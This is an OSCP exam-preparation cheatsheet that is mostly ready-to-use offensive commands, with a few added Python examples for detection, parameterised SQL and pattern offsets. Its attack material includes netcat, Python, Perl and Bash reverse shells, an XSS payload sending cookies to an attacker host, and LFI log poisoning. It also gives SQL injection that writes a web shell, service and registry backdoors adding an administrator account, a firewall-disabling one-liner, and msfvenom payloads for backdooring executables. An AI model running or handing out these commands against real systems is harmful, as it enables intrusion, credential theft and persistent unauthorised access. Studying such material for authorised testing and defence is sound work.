Go-For-Oscp

I want to share a couple of things that I think helped me prepare for the Offensive Security Certified Professional (OSCP) certification, together with what I found useful during the labs and the exam. If you have any questions, feel free to contact me.
Don't forget to:
  • Follow the courseware first and then start practicing in the labs.
  • Use additional sources to learn more.
  • Join the Offensive Security PWK forums and social media and talk to other people.

Tips

Enable service on every reboot:
update-rc.d <[SERVICE]> enable 
Extract link from html page:
cat index.html | grep "href=" | cut -d "/" -f3 | grep "<[DOMAIN]>" | cut -d '"' -f1 | sort -u
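A more robust way to do the same extraction, added here as an example (not part of the original cheatsheet): parse the HTML with Python's html.parser instead of cutting on quotes, so several links per line, single-quoted attributes and relative links are handled correctly. The HTML below is constructed, and the optional domain filter mirrors the grep "<[DOMAIN]>" stage of the pipeline.

```python
"""Extract the hostnames referenced by href attributes in an HTML document.

Added example, not part of the original cheatsheet. It does with html.parser
what the grep/cut pipeline does, but tolerates several links per line,
single-quoted attributes and relative links. The HTML below is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class HrefCollector(HTMLParser):
    """Collect the value of every href attribute on <a> and <link> tags."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("a", "link"):
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def extract_hosts(html, domain=None):
    """Return the sorted, de-duplicated hostnames linked from `html`.

    Relative links (no scheme/host) are skipped. If `domain` is given, only
    hosts equal to it or ending in "." + domain are kept, which is the same
    filter the grep "<[DOMAIN]>" stage of the pipeline applies.
    """
    parser = HrefCollector()
    parser.feed(html)
    hosts = set()
    for href in parser.hrefs:
        host = urlparse(href).hostname
        if not host:
            continue
        if domain and not (host == domain or host.endswith("." + domain)):
            continue
        hosts.add(host)
    return sorted(hosts)


# Constructed sample page: two links on one line, a single-quoted attribute,
# a relative link and an off-domain stylesheet.
SAMPLE_HTML = """<html><body>
<a href="https://www.example.com/index">home</a> <a href="http://mail.example.com:8080/">mail</a>
<a href='https://cdn.example.com/app.js'>cdn</a> <a href="/relative/path">local</a>
<link href="https://static.example.net/style.css" rel="stylesheet">
</body></html>"""

if __name__ == "__main__":
    for host in extract_hosts(SAMPLE_HTML, "example.com"):
        print(host)
```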

Netcat

Interact with an application:
nc -nv <[IP]> <[PORT]> 
Listener:
nc -nlvp <[PORT]> 
File transfer (client):
nc -nlvp <[PORT]> > <[FILE]> 
File transfer (server):
nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]> 

Bind vs Reverse Shell


Bind Shell:
Bob needs Alice's help. Bob sets up a listener on port 4444 with the -e parameter, and Alice connects to it:
(BOB):   nc -nlvp <[PORT]> -e cmd.exe
(ALICE): nc -nv <[BOB_IP]> <[PORT]>
Reverse Shell:
Alice needs Bob's help. Since Alice is behind a firewall, Bob cannot reach Alice, so Alice creates a reverse shell back to Bob's listener:
(ALICE): nc -nv <[BOB_IP]> <[PORT]> -e /bin/bash
(BOB):   nc -nlvp <[PORT]>

Zone Transfer

dnsrecon -t axfr -d <[DOMAIN]> 

Nmap

nmap -sS -sV -A -O --script="*-vuln-*" --script-args=unsafe=1 <[IP]> 

SMB

nbtscan <[SUBNET]>
nmap -p139,445 --script smb-enum-users <[SUBNET]>
nmap -p139,445 --script=smb-vuln-* --script-args=unsafe=1 <[SUBNET]>
enum4linux
smbclient -L <[IP]> -N
smbclient '\\<[IP]>\share' -N

SMTP

nmap -p25 <[SUBNET]> --open
nc -nv <[IP]> 25
VRFY <[USERNAME]>

SNMP

Steps: nmap UDP scan of port 161, build a target IP list, build a community-string list file, then use onesixtyone + snmpwalk.
nmap -sU --open -p161 <[SUBNET]>
onesixtyone -c community -i <[SNMP_IP_LIST]>
snmpwalk -c public -v1 <[IP]> <mib-values>
MIB values (for snmpwalk):
1.3.6.1.2.1.25.1.6.0     System Processes
1.3.6.1.2.1.25.4.2.1.2   Running Programs
1.3.6.1.2.1.25.4.2.1.4   Processes Path
1.3.6.1.2.1.25.2.3.1.4   Storage Units
1.3.6.1.2.1.25.6.3.1.2   Software Name
1.3.6.1.4.1.77.1.2.25    User
1.3.6.1.2.1.6.13.1.3     TCP Local Ports

File Transfer Linux

Netcat:
On victim machine (client):
nc -nlvp 4444 > <[FILE]>
On attacker machine (server):
nc -nv 10.11.17.9 4444 < <[FILE_TO_SEND]>
Curl:
curl -O http://<[IP]>/<[FILE]> 
Wget:
wget http://<[IP]>/<[FILE]> 
Recursive wget ftp download:
wget -r ftp://<[USER]>:<[PASSWORD]>@<[DOMAIN]> 

File Transfer Windows

TFTP (installed by default up to Windows XP and 2003; in Windows 7, 2008 and above it needs to be explicitly added. For this reason TFTP is not an ideal file transfer protocol in most situations.)
On attacker machine:
mkdir tftp
atftpd --daemon --port 69 tftp
cp <[FILE]> tftp
On victim machine shell:
tftp -i <[IP]> GET <[FILE]>
FTP (Windows operating systems include a default FTP client that can also be used for file transfer)
On attacker machine:
(ONE-TIME) Install an FTP server: apt-get install pure-ftpd
(ONE-TIME) Create a new user for PureFTPD (see script setup-ftp.sh) (USER demo, PASS demo1234):
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd demo -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome
/etc/init.d/pure-ftpd restart
(ONE-TIME) chmod 755 setup-ftp.sh
On victim machine shell:
echo open <[IP]> 21 > ftp.txt
echo USER demo >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
VBScript (in Windows XP, 2003)
On victim machine shell:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter +1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://<[IP]>/<[FILE]> <[FILE_NAME]>
PowerShell (in Windows 7, 2008 and above)
On victim machine shell:
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://<[IP]>/<[FILE]>" >> wget.ps1
echo $file = "evil.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Debug.exe utility (in 32-bit Windows OS; works only for files < 64 KB)
On attacker machine:
cp <[FILE]> .
upx -9 <[FILE]>   (for compression)
cp /usr/share/windows-binaries/exe2bat.exe .
wine exe2bat <[FILE]> <[FILE.txt]>
On victim machine:
Paste the content of <[FILE.txt]>

XSS

Steal a cookie via XSS:
On attacker machine set up a listener (nc -nlvp <[PORT]>).
On victim website: <script>new Image().src="http://<[IP]>:<[PORT]>/test.php?output="+document.cookie;</script>

LFI/RFI

Connect via netcat to the victim (nc -nv <[IP]> <[PORT]>) and send <?php echo shell_exec($_GET['cmd']);?> (it gets written to the web server log); after that, include the log file to get code execution:
&cmd=nc -nv <[IP]> <[PORT]> -e cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log
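From the defender's side, this pattern leaves traces in the same access log: the PHP tag in the poisoning request, the traversal sequence and the log path in the include. The Python below is an added detection example (not part of the original cheatsheet) run over constructed Apache combined-format lines with RFC 5737 addresses; the indicator list and field names are this example's own assumptions.

```python
"""Flag web-server log lines that show the LFI / log-poisoning pattern.

Added detection example, not part of the original cheatsheet. The log lines
are constructed in Apache combined format; the field names and the
indicator list are this example's own choices.
"""
import re
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Each indicator: (name, regex applied to the URL-decoded request line and user agent)
INDICATORS = [
    ("php_tag_in_request", re.compile(r"<\?php", re.I)),
    ("path_traversal", re.compile(r"(\.\./|\.\.\\){2,}")),
    ("log_file_include", re.compile(r"(access|error)\.log", re.I)),
    ("reverse_shell_cmd", re.compile(r"\bnc\b[^&]*\s-e\b", re.I)),
]


def scan_line(line):
    """Return (source_ip, [indicator names]) for one log line, or None if it
    does not parse. Decoding first matters: %3C%3Fphp is the same payload as
    <?php and would otherwise slip past the regexes."""
    m = LOG_RE.match(line)
    if not m:
        return None
    text = unquote(m.group("request")) + " " + unquote(m.group("agent"))
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    return m.group("ip"), hits


def scan_log(lines):
    """Return {source_ip: sorted indicator names} for every source that
    triggered at least one indicator anywhere in the log."""
    findings = {}
    for line in lines:
        result = scan_line(line)
        if result is None:
            continue
        ip, hits = result
        if hits:
            findings.setdefault(ip, set()).update(hits)
    return {ip: sorted(hits) for ip, hits in findings.items()}


# Constructed log lines: a benign request, the poisoning request (PHP tag in
# the URL), a URL-encoded variant carried in the User-Agent, and the include
# that points the vulnerable parameter at the log file.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2023:13:56:01 +0000] "GET /<?php echo shell_exec($_GET[\'cmd\']);?> HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2023:13:56:30 +0000] "GET / HTTP/1.1" 200 512 "-" "%3C%3Fphp%20system%28%24_GET%5Bcmd%5D%29%3B%3F%3E"',
    '192.0.2.10 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?LANG=../../../../../../../xampp/apache/logs/access.log&cmd=nc -nv 192.0.2.10 4444 -e cmd.exe HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        print(ip, ", ".join(hits))
```

The second and third sample lines show why the poisoning request is visible twice: once when it is written (whatever field it was placed in) and again when the include request names the log path.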

SQL Injection

Base:
any' or 1=1 limit 1;--
Number of columns:
order by 1, order by 2, ...
Expose data from the database:
UNION select 1,2,3,4,5,6
Enumerate tables:
UNION select 1,2,3,4,table_name,6 FROM information_schema.tables
Shell upload:
<[IP]>:<[PORT]>/<[URL]>.php?<[PARAMETER]>=999 union select 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4,5,6 into OUTFILE '/var/www/html/evil.php'
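Why the base payload works and what stops it, as an added example (not part of the original cheatsheet): the same login lookup against an in-memory SQLite table with constructed rows, once with string concatenation and once with bound parameters, plus the "order by N" column-count probe. The "limit 1;" tail of the payload is left off so the vulnerable query visibly returns every row.

```python
"""Why the ' or 1=1 payload works, and what stops it.

Added example, not part of the original cheatsheet. It builds a throwaway
SQLite database (constructed data) and runs the same login lookup twice:
once with string concatenation, once with a parameterised query.
"""
import sqlite3


def make_db():
    """In-memory users table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "pa55")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the cheatsheet exploits: user input spliced into SQL text.
    Returns the usernames the query matched."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Same lookup with bound parameters: the payload is compared as a plain
    string value and can never change the structure of the query."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def count_columns_probe(conn, injected):
    """Mirror of the 'order by N' column-count technique: True if the
    injected ORDER BY term executes, False if the database rejects it
    (here because N exceeds the three selected columns)."""
    try:
        list(conn.execute("SELECT id, username, password FROM users ORDER BY %s" % injected))
        return True
    except sqlite3.OperationalError:
        return False


if __name__ == "__main__":
    conn = make_db()
    payload = "any' or 1=1 --"   # the cheatsheet's base payload without the limit/semicolon tail
    print("vulnerable:", login_vulnerable(conn, payload, "x"))
    print("safe:      ", login_safe(conn, payload, "x"))
    print("order by 3:", count_columns_probe(conn, "3"), " order by 4:", count_columns_probe(conn, "4"))
```

The parameterised version is the fix: the driver sends the query text and the values separately, so the quote in the payload is data rather than syntax.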

Buffer Overflow

/usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]>
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <[ADDRESS]>
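What these two scripts compute, as an added pure-Python example (not Metasploit's own code): the cyclic pattern and the offset lookup. The register value can be given either as the four characters seen in the debugger or as the hex value, which is read little-endian the way the CPU stored it.

```python
"""Pure-Python equivalent of pattern_create.rb / pattern_offset.rb.

Added example, not part of the original cheatsheet or of Metasploit. It
reproduces the standard three-character cyclic pattern (Aa0Aa1Aa2...) and
shows how the offset of an overwritten register is located from its value.
"""
import string


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern. Every
    3-character group is upper + lower + digit, so any 4-character window is
    unique within the full 26 * 26 * 10 * 3 = 20280 characters."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=20280):
    """Offset of `value` inside the pattern, or None if it is not there.

    `value` may be the 4 characters read from the debugger ("Ab2A") or the
    register contents as an int or "0x..." string (0x41326241), which is
    converted to its 4 little-endian bytes before searching."""
    if isinstance(value, str) and value.lower().startswith("0x"):
        value = int(value, 16)
    if isinstance(value, int):
        value = value.to_bytes(4, "little").decode("ascii", errors="replace")
    idx = pattern_create(length).find(value)
    return None if idx < 0 else idx


if __name__ == "__main__":
    print(pattern_create(40))
    print(pattern_offset("0x41326241"))
```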

Privilege Escalation

Vulnerable Services
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
sc qc <[VULNERABLE_SERVICE]>
sc config <[VULNERABLE_SERVICE]> obj= ".\LocalSystem" password= ""
sc config <[VULNERABLE_SERVICE]> start= "auto"
sc config <[VULNERABLE_SERVICE]> binpath= "net user hacker Hacker123 /add"
sc stop <[VULNERABLE_SERVICE]>
sc start <[VULNERABLE_SERVICE]>
sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup administrators hacker /add"
sc stop <[VULNERABLE_SERVICE]>
sc start <[VULNERABLE_SERVICE]>
sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup \"Remote Desktop Users\" hacker /add"
sc stop <[VULNERABLE_SERVICE]>
sc start <[VULNERABLE_SERVICE]>
Win10:
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
Then press Ctrl+Alt+Del and start the on-screen keyboard.

Pass the hash

export SMBHASH=<[HASH]>
pth-winexe -U administrator% //<[IP]> cmd

Cracking

Medusa
medusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND" 
Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC)
ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]> 
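Tools like these produce a burst of failed logins from a single source. The Python below is an added detection example (not part of the original cheatsheet) that flags sources exceeding a failure threshold inside a sliding time window, run over constructed sshd auth.log lines with RFC 5737 addresses. The threshold, window, log format and assumed year are this example's own choices.

```python
"""Spot the login brute force that Medusa / Ncrack produce, from server logs.

Added detection example, not part of the original cheatsheet. It parses
constructed sshd auth.log lines and reports source addresses that exceed a
failure threshold inside a sliding time window; threshold, window, log
format and the assumed year are this example's assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# sshd failure line as written by syslog (no year in the timestamp)
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(lines, year=2023):
    """Yield (timestamp, source_ip, username) for every failed-password line."""
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
            yield ts, m.group("ip"), m.group("user")


def find_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {ip: (peak failures inside one window, distinct usernames tried)}
    for sources with at least `threshold` failures within `window_seconds`.
    A deque per source keeps only the timestamps still inside the window, so
    memory stays bounded however long the log is (lines assumed chronological)."""
    recent = defaultdict(deque)
    users = defaultdict(set)
    flagged = {}
    for ts, ip, user in parse_failures(lines):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            peak = max(flagged.get(ip, (0, 0))[0], len(q))
            flagged[ip] = (peak, len(users[ip]))
    return flagged


# Constructed lines: two isolated failures from one host followed by a
# successful login, then six failures in five seconds from another host
# cycling through several usernames, which is the wordlist-driven pattern.
SAMPLE_LOG = [
    "Oct 10 13:10:00 host sshd[1100]: Failed password for alice from 198.51.100.9 port 40000 ssh2",
    "Oct 10 13:40:00 host sshd[1150]: Failed password for alice from 198.51.100.9 port 40001 ssh2",
    "Oct 10 13:41:00 host sshd[1151]: Accepted password for alice from 198.51.100.9 port 40002 ssh2",
    "Oct 10 13:55:01 host sshd[1201]: Failed password for invalid user admin from 192.0.2.50 port 51000 ssh2",
    "Oct 10 13:55:02 host sshd[1202]: Failed password for root from 192.0.2.50 port 51001 ssh2",
    "Oct 10 13:55:03 host sshd[1203]: Failed password for invalid user test from 192.0.2.50 port 51002 ssh2",
    "Oct 10 13:55:04 host sshd[1204]: Failed password for invalid user guest from 192.0.2.50 port 51003 ssh2",
    "Oct 10 13:55:05 host sshd[1205]: Failed password for root from 192.0.2.50 port 51004 ssh2",
    "Oct 10 13:55:06 host sshd[1206]: Failed password for root from 192.0.2.50 port 51005 ssh2",
]

if __name__ == "__main__":
    for ip, (count, distinct) in find_bruteforce(SAMPLE_LOG).items():
        print("%s: %d failures in window, %d distinct users" % (ip, count, distinct))
```

The distinct-username count is what separates a password-spray or wordlist run from one user mistyping a password several times.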

Firewall

Enable Remote Desktop:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set service remotedesktop enable
Enable Remote Assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
Disable firewall:
netsh firewall set opmode disable
One-shot combo (new admin user, firewall off + RDP):
set CMD "net user hacker Hacker123 /add & net localgroup administrators hacker /add & net localgroup \"Remote Desktop Users\" hacker /add & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall set opmode disable"

Backdooring EXE Files

msfvenom -a x86 -x <[FILE]> -k -p windows/meterpreter/reverse_tcp lhost=10.11.0.88 lport=443 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o <[FILE_NAME]>

Binaries payloads

Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f elf > <[FILE_NAME.elf]> 
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f exe > <[FILE_NAME.exe]> 
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f macho > <[FILE_NAME.macho]> 

Web payloads

PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.php]>
cat <[FILE_NAME.php]> | pbcopy && echo '<?php ' | tr -d '\n' > <[FILE_NAME.php]> && pbpaste >> <[FILE_NAME.php]>
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f asp > <[FILE_NAME.asp]> 
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.jsp]> 
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f war > <[FILE_NAME.war]>

Scripting Payloads

Python:
msfvenom -p cmd/unix/reverse_python LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.py]> 
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.sh]> 
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.pl]> 

Shellcode

For all shellcode, see 'msfvenom --help-formats' for the valid output formats. msfvenom will output code that can be cut and pasted into your exploit in that language.
Linux Based Shellcode:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]> 
Windows Based Shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]> 
Mac Based Shellcode:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]> 

Staged vs Non-Staged Payloads

Staged payload (useful for BOF; needs a Metasploit multi/handler in order to work):
windows/shell/reverse_tcp
msfvenom -a x86 -p linux/x86/shell/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_STAGED]>
Non-staged payload (works with a plain netcat listener):
windows/shell_reverse_tcp
msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_NON_STAGED]>

Handlers

Metasploit handlers are a quick way to get Metasploit ready to receive your incoming shells. Handlers should be in the following format:
use exploit/multi/handler
set PAYLOAD <[PAYLOAD_NAME]>
set LHOST <[IP]>
set LPORT <[PORT]>
set ExitOnSession false
exploit -j -z

Shell Spawning

Python:
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<[IP]>",<[PORT]>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Bash:
echo os.system('/bin/bash')
/bin/sh -i
exec 5<>/dev/tcp/<[IP]>/<[PORT]>
cat <&5 | while read line; do $line 2>&5 >&5; done
Perl:
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
perl -e 'use Socket;$i="<[IP]>";$p=<[PORT]>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Telnet:
mknod /tmp/yyy p && /bin/bash 0</tmp/yyy | telnet <[IP]> <[PORT]> 1>/tmp/yyy 
Ruby:
ruby: exec "/bin/sh" 
Lua:
lua: os.execute('/bin/sh') 
From inside IRB:
exec "/bin/sh" 
From inside vi:
:!bash
From inside vi (set the shell first, then drop into it):
:set shell=/bin/bash
:shell
From inside nmap:
!sh 